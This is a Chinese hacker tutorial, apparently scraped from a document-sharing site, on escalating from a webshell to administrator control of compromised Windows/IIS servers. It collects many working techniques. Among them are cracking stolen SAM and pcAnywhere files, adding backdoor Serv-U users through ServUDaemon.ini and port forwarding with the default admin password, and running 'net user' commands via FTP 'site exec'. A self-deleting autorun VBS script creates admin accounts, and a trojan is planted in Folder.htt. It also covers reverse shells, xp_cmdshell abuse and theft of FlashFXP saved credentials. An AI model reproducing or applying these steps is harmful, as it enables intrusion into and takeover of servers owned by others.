webshell 提权 终结者22页.docx
《webshell 提权 终结者22页.docx》由会员分享,可在线阅读,更多相关《webshell 提权 终结者22页.docx(39页珍藏版)》请在冰豆网上搜索。
webshell提权终结者22页
在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。
本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用
WEBSHELL权限提升技巧
c:
d:
e:
.....
C:
\DocumentsandSettings\AllUsers\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:
\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:
\ProgramFiles\serv-u\
C:
\WINNT\system32\config\
下它的SAM,破解密码
c:
\winnt\system32\inetsrv\data\
是erveryone完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:
\prel
C:
\ProgramFiles\JavaWebStart\
c:
\DocumentsandSettings\
C:
\DocumentsandSettings\AllUsers\
c:
\winnt\system32\inetsrv\data\
c:
\ProgramFiles\
c:
\ProgramFiles\serv-u\
C:
\ProgramFiles\MicrosoftSQLServer\
c:
\Temp\
c:
\mysql\(如果服务器支持PHP)
c:
\PHP(如果服务器支持PHP)
运行"cscriptC:
\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:
\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动"写入bat,vbs等木马。
根目录下隐藏autorun.inf
C:
\PROGRAMFILES\KV2004\绑
D:
\PROGRAMFILES\RISING\RAV\
C:
\ProgramFiles\Real\RealServer\
rar
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下
replace替换法捆绑
脚本编写一个启动/关机脚本重起
删SAM:
(错
CAcls命令
FlashFXP文件夹Sites.datSites.dat.bakStats.datStats.dat.bak
Ring的权限提升21大法!
以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。
本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。
希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。
封装个radmin上去,运行,开对方端口,然后radmin上去
。
本人从来米成功过。
,端口到是给对方打开了。
2.paanywhere
C:
\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\这里下他的GIF
文件,在本地安装pcanywhere上去
3.SAM破解
C:
\WINNT\system32\config\下他的SAM破解之
4.SU密码夺取
C:
\DocumentsandSettings\AllUsers\「开始」菜单\程序\
引用:
Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN│1]
Password=
HomeDir=c:
\
TimeOut=600
Maintenance=System
Access1=C:
\│RWAMELCDP
Access1=d:
\│RWAMELCDP
Access1=f:
\│RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以ftp上去quotesiteexecxxx来提升权限
5.c:
\winnt\system32\inetsrv\data\
引用:
就是这个目录,同样是erveryone完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.SU溢出提权
这个网上教程N多不详细讲解了
7.运行Csript
引用:
运行"cscriptC:
\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps"来提
升权限
用这个cscriptC:
\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps
查看有特权的dll文件:
idq.dllhttpext.dllhttpodbc.dllssinc.dllmsw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:
\winnt\system32\inetsrv\asp.dll(不同的机子放的位置不一定一样)
我们现在加进去cscriptadsutil.vbsset/W3SVC/InProcessIsapiApps"C:
\WINNT\system32\idq.dll"
"C:
\WINNT\system32\inetsrv\httpext.dll""C:
\WINNT\system32\inetsrv\httpodbc.dll"
"C:
\WINNT\system32\inetsrv\ssinc.dll""C:
\WINNT\system32\msw3prt.dll""c:
\winnt\system32
\inetsrv\asp.dll"
可以用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps来查看是不是加进去了8.脚本提权
c:
\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动"写入bat,vbs
9.VNC
这个是小花的文章HOHO
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:
\>vncx4-W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上HOHOOK了
11.社会工程学之GUEST提权
很简单查看他的拥护一般来说看到帐户以后密码尽量猜可能用户密码一样也可能是他QQ号邮
箱号手机号尽量看看HOHO
12.IPC空连接
如果对方真比较白痴的话扫他的IPC如果运气好还是弱口令
13.替换服务
这个不用说了吧?
个人感觉相当复杂
14.autorun.inf
autorun=xxx.exe这个=后面自己写HOHO加上只读、系统、隐藏属性传到哪个盘都可以的不相信
他不运行
15.desktop.ini与Folder.htt
引用:
首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义
文件夹"(xp好像是不行的)一直下点,默认即可。
完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后
我们在Foldersetting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
然后你将你的后门文件放在Foldersetting目录下,把此目录与desktop.ini一起上传到对方
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini覆盖掉,重
起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
43958这个是Serv-U的本地管理端口。
FPIPE.exe上传他,执行命令:
Fpipe–v–l3333–r
43958127.0.0.1意思是将4444端口映射到43958端口上。
然后就可以在本地安装一个Serv-u,新建一个
服务器,IP填对方IP,帐号为LocalAdministrator密码为#1@$ak#.1k;0@p连接上后你就可以管理他的
Serv-u了
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的
ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:
对方没有删除xp_cmdshell方法:
使用Sqlexec.exe,在host一栏中填入对方IP,User与Pass
中填入你所得到的用户名与密码。
format选择xp_cmdshell"%s"即可。
然后点击connect,连接上后就可
以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
引用:
因为asp.dll是放在c:
\winnt\system32\inetsrv\asp.dll(不同的机子放的位置不一定相同
)
我们现在加进去cscriptadsutil.vbsset/W3SVC/InProcessIsapiApps"C:
\WINNT\system32\idq.dll"
"C:
\WINNT\system32\inetsrv\httpext.dll""C:
\WINNT\system32\inetsrv\httpodbc.dll"
"C:
\WINNT\system32\inetsrv\ssinc.dll""C:
\WINNT\system32\msw3prt.dll""c:
\winnt\system32
\inetsrv\asp.dll"
好了,现在你可以用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到
C:
\Inetpub\AdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把
asp.dllT出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.MagicWinmail
前提是你要有个webshell引用:
21.DBO……
其实提升权限的方式很多的就看大家怎么利用了HOHO加油吧将服务器控制到底!
感谢noangel
WEBSHELL权限提升
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?
这正是我们这次要讨论的内容
OK,进入我的WEBSHELL
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。
先看看他的SERV-U的版本是多少,telnetXXX.XXX.XXX.XXX21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。
后来完毕后扫描了下,也只有FTP的洞没有补。
既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具,图三
在运行CMD命令里输入d:
\\wwwroot\\fpipe.exe-v-l81-r43958127.0.0.1意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。
服务名称随便你喜欢,怎么样都行。
然后是用户名:
LocalAdministrator密码:
#l@$ak#.lk;0@P(密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。
也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quotesiteexecnet.exeuserhkpass/add
ftp>quotesiteexecnet.exelocalgroupadministratorshk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具
二
auto.ini加SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dimwsh
setwsh=createObject("WScript.Shell")
wsh.run"netuserguest/actives",0
wsh.run"netuserguest520ls",0
wsh.run"netlocalgroupadministratorsguest/add",0
wsh.run"netuserhkbme520ls/add",0
wsh.run"netlocalgroupadministratorshkbme/add",0
wsh.run"cmd.exe/cdelautorun.inf",0
wsh.run"cmd.exe/cdelshell.vbs",0
但是这样要可以访问到对方的根目录。
将这两个文件放到对方硬盘的根目录下。
当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序
三
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上
四
replace
替换法,可以替换正在执行的文件。
用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。
为什么不直接替换木马呢?
如果替换的是关键程序,那不是就直接挂了?
所以还是捆绑好点
格式
REPLACE[drive1:
][path1]filename[drive2:
][path2][/A]
[/R][/W]
REPLACE[drive1:
][path1]filename[drive2:
][path2]
[/R][/S][/W]
[drive1:
][path1]filename指定源文件。
[drive2:
][path2]指定要替换文件的
目录。
/A把新文件加入目标目录。
不能和
/S或/U命令行开关搭配使用。
/P替换文件或加入源文件之前会先提示您
进行确认。
/R替换只读文件以及未受保护的
文件。
/S替换目标目录中所有子目录的文件。
不能与/A命令选项
搭配使用。
/W等您插入磁盘以后再运行。
/U只会替换或更新比源文件日期早的文件。
不能与/A命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下
五
脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。
内容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
将文件scripts.ini保存到"C:
\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
A.BAT的内容可以是NETUSERyonghumima
也可以是NETUSERADMINistratorXXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限
六
SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。
不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换
使用FlashFXP来提升权限最近各位一定得到不少肉鸡吧:
),从前段时间的动网的upfile漏洞,动力文章系统最新漏洞到firstsee发现的动网sql版本的一个超级大漏洞。
有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。
至于提升权限的问题呵呵,很少有人能作一口气完成。
关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。
我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙招了。
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的DocumentsandSettings/AllUsers/ApplicationData/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问题吧。
其三,通过替换系统服务来提升。
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:
)
本人通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够黑吧。
提升权限没时间做。
在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版本的。
郁闷啊!
突然想起我将一个页面插入了asp的后门,看看还有没有希望了。
输=1好家伙,还在!
高兴ing
图1
于是上传了一个asp的脚本的后门,怎么提升权限呢?
在这个网站的主机上游荡了N分钟,在C:
\\ProgramFiles下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites.dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.datSites.dat.bakStats.datStats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。
打开flashfxp在站点中打开站点管理器一项。
乖乖发财了
对方管理员通过flashfxp连接的各个站点都在图3,点击连接。
通过了于是我们又有了一堆肉鸡,我们有ftp权限。
上传脚本木马~呵呵。
说了半天这提升权限的事情一点没讲啊
不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。
可惜啊!
又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。
现在的星号密码会不会也是加了密的?
看看就行了呗。
怎么看?
菜鸟了吧手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。
看图4和图5的比较很显然在站点管理器中查看到的密码是明文显示的。
发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。
看者这些复杂的密码,还真有点怀念当年玩sniff的时光。
呵呵
密码为:
b69ujkq6hyndai790s584p*fv4-c+98cq3jk43-8*ef./2z5+
用户名:
bn7865tnilei75qm/-g57+3knqm/-g57+3kn5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按社会工程学的概念来说,没有管理员的密码。
打死我也不相信。
最终我得到了这个网站管理员的密码从这堆东西中找到的。
我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。
经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。
希望大家在入侵的时候遇到flashfxp的时候能想到这个方法,至少也可